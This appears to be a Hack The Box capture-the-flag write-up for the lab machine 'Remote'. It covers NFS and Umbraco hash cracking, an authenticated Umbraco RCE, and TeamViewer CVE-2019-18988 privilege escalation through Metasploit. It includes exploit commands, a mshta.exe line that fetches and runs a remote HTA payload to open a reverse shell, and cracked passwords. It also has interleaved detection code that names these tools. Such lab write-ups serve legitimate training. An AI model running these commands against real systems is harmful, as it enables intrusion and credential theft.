
Hack The Box Write-Up Remote – 10.10.10.180

It doesn’t matter how many times you get knocked down. All that matters is you get up one more time than you were knocked down.

Roy T. Bennett

About Remote

In this post, I'm writing a write-up for the machine Remote from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.

Remote is an 'Easy' rated box. Grabbing and submitting the user.txt flag raises your points by 10, and submitting the root flag raises them by 20.

Foothold

After the port scan, I found that this box is hosting a website, which is reachable on port 80/tcp. To log in to the backend, credentials are needed. These credentials can be found in the Umbraco.sdf database hosted on an NFS share. After logging in to the backend of the website, I noticed that this website uses the Umbraco CMS.

User

The website is using Umbraco version 7.12.4, which contains an (authenticated) remote command execution vulnerability. Through this RCE I was able to get the user flag by using the exploit modified by noraj.

Root

After basic enumeration, I found the remote service, which can be exploited due to a vulnerability in TeamViewer Desktop version 7. Normally, I root a box manually. Because I think it is nice to root a box with Metasploit once in a while, I have used Metasploit to root this machine.

Machine Info

[image: Hack The Box machine info card for Remote, showing the IP 10.10.10.180 and the creator]

Recon

Port scan with Nmap

As always, I start with a port scan with Nmap.

nmap -sC -sV -oA ./nmap/remote.txt 10.10.10.180

The results.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 16:53 EDT
Nmap scan report for 10.10.10.180
Host is up (0.079s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m13s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-21T20:56:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.87 seconds

There are several open ports.

  1. 21/tcp (FTP), anonymous FTP login allowed 🙂
  2. 80/tcp (HTTP)
  3. 111/tcp (SunRPC)
  4. 135/tcp (Microsoft Windows RPC)
  5. 139/tcp (NetBIOS)
  6. 445/tcp (SMB)
  7. 2049/tcp (Network File System (NFS))

Enumeration FTP

The File Transfer Protocol (FTP) is a protocol that can be used to transfer data between a client and a server on a network.

Nmap found the FTP port with anonymous login allowed. I opened an FTP session to this box on port 21 and logged in with the username anonymous and the password anonymous.

~$ ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>

I tried to list the contents, but no files are shown. I tried some other commands as well, but nothing useful came back.

Enumeration Web Server

The Nmap scan found that the HTTP port is open. I checked the web service, and there is a website hosted on this box named Acme Widgets.

http://10.10.10.180

On the Contact page, there is a button that redirects me to a login page. According to the source code, this website is using the open-source CMS Umbraco. I tried the default username admin and the default password Admin1234!, but no luck. I need to find the credentials. Umbraco usually stores its credentials in the Umbraco.sdf database file.

Let’s check the NFS, maybe I have access to this database file.

Enumeration NFS (Network File System)

The next step is some enumeration on the NFS port 2049. It turns out that there is an NFS share.

kali@kali:/home/htb/boxes/remote$ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
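An export open to everyone, like /site_backups above, is the first thing to look for in an NFS review. The following is an added example, not part of the write-up, that parses showmount -e output and flags exports that any host may mount; the constructed sample repeats the line above and adds two made-up exports for contrast.

```python
"""Audit an NFS export list for world-mountable shares.

Added example: parses the text printed by `showmount -e` and reports
exports whose client list lets any host mount them.
"""
import re
from dataclasses import dataclass

# Constructed sample: the /site_backups line mirrors the write-up, the
# other two exports are made up to show a restricted and a wildcard case.
SAMPLE_SHOWMOUNT = """Export list for 10.10.10.180:
/site_backups (everyone)
/scratch      192.168.1.0/24,10.0.0.5
/public       *
"""


@dataclass
class Export:
    path: str
    clients: list

    def is_world_mountable(self) -> bool:
        """True when the client list allows any host to mount the export."""
        return any(c.lower() in ("everyone", "*") for c in self.clients)


def parse_showmount(text: str) -> list:
    """Parse both 'path (clients)' (Windows NFS) and 'path clients' (Linux)."""
    exports = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Export list for"):
            continue
        m = re.match(r"^(\S+)\s+\(?([^)]*)\)?$", line)
        if not m:
            continue  # unrecognised line; skip rather than guess
        clients = [c for c in re.split(r"[,\s]+", m.group(2)) if c]
        exports.append(Export(m.group(1), clients))
    return exports


def risky_exports(text: str) -> list:
    """Paths that any host may mount; each one needs an access-control review."""
    return [e.path for e in parse_showmount(text) if e.is_world_mountable()]


if __name__ == "__main__":
    for path in risky_exports(SAMPLE_SHOWMOUNT):
        print(f"[!] {path} is mountable by any host")
```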

Now I can mount that share and walk through the files. In my working directory, I create a directory called tb_mount.

~$ mount -t nfs 10.10.10.180:/site_backups /home/htb/boxes/machines/remote/tb_mount/
~$ ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

It seems that I have access to the source files of the website. After a quick search, I found the Umbraco.sdf database file.

~$ cd App_Data
/App_Data$ ls
cache  Logs  Models  packages  TEMP  umbraco.config  Umbraco.sdf

With cat I can check the contents of this file. It is a binary database, so most of the output is unreadable, but the readable strings are interesting.

/App_Data$ cat Umbraco.sdf
VttyAdministratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d׃[email protected]
calb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50BiIfhVgvrfhVgXvadminadmin@htb.loca
lb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}[email protected][{"alias":"umbIntroIntroduction","co
mpleted":false,"disabled":true}][email protected]==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"
}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e?gAg.ogOgYwssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUA
dpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}[email protected]~
g)
g.og7
[email protected]+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}[email protected]
-4ab0-93f7-5ee9724c8d32#0 A$C=HDY^`FnyPHI KPM
@`CprGPLUHUH4-`II AEEqDD|       5!
Eq
Q
|p!p`@8~!PI@
|p!p~!PIEEqDD|  5!
Eq
Q
|p!p~!HH|
....

At the top of this file, some usernames and hashed passwords are listed. The first hash is a SHA1 hash. I saved this hash in the file password.txt.

b8be16afba8c314ad33d812f22a04991b90e2aaa

Now it is time for john.

~$ john password.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160"
Use the "--format=has-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 SSE2 4x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese   (?)
1g 0:00:00:01 DONE (2020-03-28 15:29) 0.6493g/s 6379Kp/s 6379Kc/s 6379KC/s baconandchipies1..baconandcabbage
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

John cracked the hash and found the password baconandcheese. Let's see whether I can log in through the portal.

Username: admin@htb.local
Password: baconandcheese

I'm able to log in to the backend of this website and land in the CMS. At the bottom, there is a help question mark; there the version of Umbraco is visible.

[image: Umbraco backend, with the version shown in the help panel]

Exploitation

Remote Code Execution (RCE)

Let's use searchsploit to check whether there is a known vulnerability for this version of Umbraco.

~$ searchsploit Umbraco
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                      |  Path
                                                                                                                    | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                                                 | exploits/windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                                          | exploits/aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                                          | exploits/php/webapps/44988.txt
-------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

There is an (authenticated) remote code execution exploit for this version of Umbraco. As I already have access to the portal, I'm authenticated against this service. I can use the exploit 46153.py, or the modified exploit created by noraj. I have used both: with the first exploit I was able to create a reverse shell, and with the exploit from noraj no reverse shell is needed. I used the latter for this write-up.

Getting user access

I downloaded the exploit from GitHub.

~$ sudo git clone https://github.com/noraj/Umbraco-RCE
Cloning into 'Umbraco-RCE'...
remote: Enumerating objects: 25, done.
remote: Counting objects: 100% (25/25), done.
remote: Compressing objects: 100% (25/25), done.
remote: Total 25 (delta 8), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (25/25), 7.98 KiB | 371.00 KiB/s, done.

I launched this exploit with the command below.

~$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'hostname; pwd; whoami'
remote

iis apppool\defaultapppool
Path                       
----                       
C:\windows\system32\inetsrv

The exploit worked, and it seems that I have permissions as the user iis apppool\defaultapppool. After a little searching and poking around, I found the user flag in the C:\Users\Public directory.

~$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'cd $env:public; ls'


    Directory: C:\Users\Public


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-r---        2/19/2020   3:03 PM                Documents                                                             
d-r---        9/15/2018   3:19 AM                Downloads                                                             
d-r---        9/15/2018   3:19 AM                Music                                                                 
d-r---        9/15/2018   3:19 AM                Pictures                                                              
d-r---        9/15/2018   3:19 AM                Videos                                                                
-ar---         4/2/2020   2:26 PM             34 user.txt    

With the command below I can grab the user flag.

~$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'cd $env:public; cat user.txt'
e93cb767cba5bb6c03b1bb4fa3971019

Privilege Escalation

Enumeration

Now that I have user privileges on this box, I need to enumerate further to find a way to escalate my privileges. First, I checked the running processes, and it turns out that there is a TeamViewer_Service running. Since the name of this box is Remote, and coincidences do not exist, the box name is a hint towards this service.

~$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'Get-Process'
...
    115       7     1268       5400              5096   0 svchost
    360      26     8504      17696              5524   0 svchost
    229      15     4124      13552              5760   0 svchost
    120       7     1360       5844              5920   0 svchost
    160       9     2700       7296              6128   0 svchost
   1581       0      192        148                 4   0 System
   1098      23     4976      18724              3068   0 TeamViewer_Service
    178      12     3232      10312              3040   0 VGAuthService
    122       8     1572       6404              1392   0 vmacthlp
    298      21     5504      18336              2408   0 vmtoolsd
   1560     125   283540     284652      22.00   1752   0 w3wp
    175      11     1532       6884               480   0 wininit
    254      12     2748      14288               548   1 winlogon
    168      11     1564       7556              4984   0 WmiApSrv
    368      16     8544      17852              4664   0 WmiPrvSE
    569      26    15068      24616              5380   0 WmiPrvSE

It's important to know which version of TeamViewer is installed.

~$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'Get-Service'

Status   Name               DisplayName
------   ----               -----------
...
Running  SystemEventsBroker System Events Broker
Stopped  TabletInputService Touch Keyboard and Handwriting Pane...
Stopped  tapisrv            Telephony
Running  TeamViewer7        TeamViewer 7
Stopped  TermService        Remote Desktop Services
Running  Themes             Themes
Stopped  TieringEngineSe... Storage Tiers Management
Running  TimeBrokerSvc      Time Broker
...

TeamViewer 7 is installed on this box. This is a very outdated version of TeamViewer, so there should definitely be a way to exploit this service for privilege escalation.

Exploitation

CVE-2019-18988

After a little search on the internet, I found this article: https://whynotsecurity.com/blog/teamviewer/. It describes the vulnerability CVE-2019-18988, which affects TeamViewer Desktop from version v7.0.43148 through version 14.7.1965. It allows a bypass of remote-login access control because the same key is used for different customers' installations. With versions before v9.x, this allowed attackers to decrypt the Unattended Access password to the system (which allows remote login to the system as well as headless file browsing).
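From the defender's side, that version range is an inventory check. The following is an added example (my own code, not from the write-up or the linked article) that takes a version string, or a service display name like the "TeamViewer 7" seen in the Get-Service output, and reports whether it falls inside the range quoted above; the pre-9.x flag follows the text's remark about the Unattended Access password.

```python
"""Check a TeamViewer version against the CVE-2019-18988 range quoted above.

Added example (not from the write-up): the bounds are exactly the ones the
text gives, 7.0.43148 through 14.7.1965, and 'unattended_password_exposed'
follows its remark that builds before 9.x let the Unattended Access
password be decrypted.
"""
from typing import NamedTuple

FIRST_AFFECTED = (7, 0, 43148)
LAST_AFFECTED = (14, 7, 1965)


class Verdict(NamedTuple):
    affected: bool
    unattended_password_exposed: bool


def parse_version(text: str) -> tuple:
    """Accept '7.0.43148', 'v14.7.1965' or a bare '7'; return the numeric parts."""
    parts = text.strip().lstrip("vV").split(".")
    nums = tuple(int(p) for p in parts if p.isdigit())
    if not nums:
        raise ValueError(f"not a version string: {text!r}")
    return nums


def assess(version: str) -> Verdict:
    v = parse_version(version)
    if len(v) >= 3:
        affected = FIRST_AFFECTED <= v[:3] <= LAST_AFFECTED
    else:
        # Only a major (or major.minor) is known, e.g. from the service name
        # "TeamViewer 7". Every major line from 7 to 14 contains affected
        # builds, so report it and go find the exact build number.
        affected = FIRST_AFFECTED[0] <= v[0] <= LAST_AFFECTED[0]
    return Verdict(affected, affected and v[0] < 9)


def assess_service(display_name: str) -> Verdict:
    """Work from a service DisplayName such as 'TeamViewer 7'."""
    tokens = display_name.split()
    if len(tokens) < 2 or tokens[0].lower() != "teamviewer":
        raise ValueError(f"not a TeamViewer service name: {display_name!r}")
    return assess(tokens[1])


if __name__ == "__main__":
    # "14.7.1966" is simply the first build past the quoted upper bound.
    for probe in ("TeamViewer 7", "TeamViewer 14.7.1965", "TeamViewer 14.7.1966"):
        print(probe, assess_service(probe))
```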

Normally, I do the exploitation manually. But this privilege escalation I will do with Metasploit. Why? Because I think it is nice to root a box with Metasploit once in a while. For this privilege escalation, I'm using the 'post/windows/gather/credentials/teamviewer_passwords' module from Metasploit.

msf5 > search teamviewer

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  post/windows/gather/credentials/teamviewer_passwords                   normal  No     Windows Gather TeamViewer Passwords

First, I need to create a reverse shell before I can use this module. I decided to create a reverse shell with mshta.exe. This program is the Microsoft HTML Application Host and is responsible for running HTML application files. The program is not considered harmful by itself, which is exactly why it can be used to launch a reverse shell. Metasploit also has a module for it.

msf5 > use exploit/windows/misc/hta_server
msf5 exploit(windows/misc/hta_server) > set srvhost 10.10.14.31
srvhost => 10.10.14.31
msf5 exploit(windows/misc/hta_server) > set lhost 10.10.14.31
lhost => 10.10.14.31
msf5 exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Using URL: http://10.10.14.31:8080/70UN29zyQv.hta
[*] Server started.
msf5 exploit(windows/misc/hta_server) >

I need to deliver this payload to the box.

~$ python3 exploit.py -u admin@htb.local -p "baconandcheese" -i http://10.10.10.180 -c powershell.exe -a 'mshta.exe http://10.10.14.31:8080/6JZCCUIx.hta'

The payload was delivered and I now have a reverse shell. The default behaviour of Metasploit is that the session opens in the background, so I need to interact with this session to exploit TeamViewer.
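From the blue-team side, the chain this step produces (IIS worker process, then PowerShell, then mshta.exe fetching a remote .hta) stands out in process-creation telemetry. The following is an added example, not part of the write-up, that runs two detections over constructed Sysmon-style events; the field names and sample events are my own, and only the mshta URL repeats the command above.

```python
"""Detect the IIS -> PowerShell -> mshta.exe chain shown above.

Added example, not part of the write-up: two detections run over
constructed process-creation events (Sysmon Event ID 1 style fields).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


# Constructed events mirroring the chain in the write-up: the IIS worker
# runs PowerShell, which launches mshta.exe against a remote .hta file.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe mshta.exe http://10.10.14.31:8080/6JZCCUIx.hta",
              r"IIS APPPOOL\DefaultAppPool"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://10.10.14.31:8080/6JZCCUIx.hta",
              r"IIS APPPOOL\DefaultAppPool"),
    # Benign control: an administrator opening a local HTA from Explorer.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Tools\helpdesk.hta"',
              r"REMOTE\helpdesk"),
]

SHELLS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def web_worker_spawned_shell(ev: ProcEvent) -> bool:
    """An IIS worker process has no business launching interpreters."""
    return basename(ev.parent_image) == "w3wp.exe" and basename(ev.image) in SHELLS


def mshta_remote_hta(ev: ProcEvent) -> bool:
    """mshta.exe pulling an application from a URL is the classic LOLBin abuse."""
    return basename(ev.image) == "mshta.exe" and bool(REMOTE_URL.search(ev.command_line))


def triage(events) -> list:
    """Return (rule name, offending image) pairs for every matching event."""
    hits = []
    for ev in events:
        if web_worker_spawned_shell(ev):
            hits.append(("iis_spawned_shell", basename(ev.image)))
        if mshta_remote_hta(ev):
            hits.append(("mshta_remote_url", basename(ev.image)))
    return hits


if __name__ == "__main__":
    for rule, image in triage(SAMPLE_EVENTS):
        print(f"[!] {rule}: {image}")
```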

[*] Sending stage (180291 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.14.31:4444 -> 10.10.10.180:49704) at 2020-04-02 15:32:11 -0400
msf5 exploit(windows/misc/hta_server) > sessions -i

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter x86/windows  IIS APPPOOL\DefaultAppPool @ REMOTE  10.10.14.31:4444 -> 10.10.10.180:49704 (10.10.10.180)

msf5 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...

I'm now interacting with my reverse shell, and the module to exploit TeamViewer can be run from the meterpreter.

meterpreter > run post/windows/gather/credentials/teamviewer_passwords

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /home/kali/.msf4/loot/20200402153617_default_10.10.10.180_host.teamviewer__104747.txt

Own Remote

I now have the password. Next I can try to establish a remote session with Evil-WinRM.

~$ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
627c5d7c4a820ff0f9681531ace088ea

The box is now rooted. I have really enjoyed writing this post. Please give me a respect if you enjoyed reading this write-up; I really appreciate it. My profile: https://app.hackthebox.com/profile/224856.

Happy Hacking!

This post is licensed under CC BY 4.0 by the author.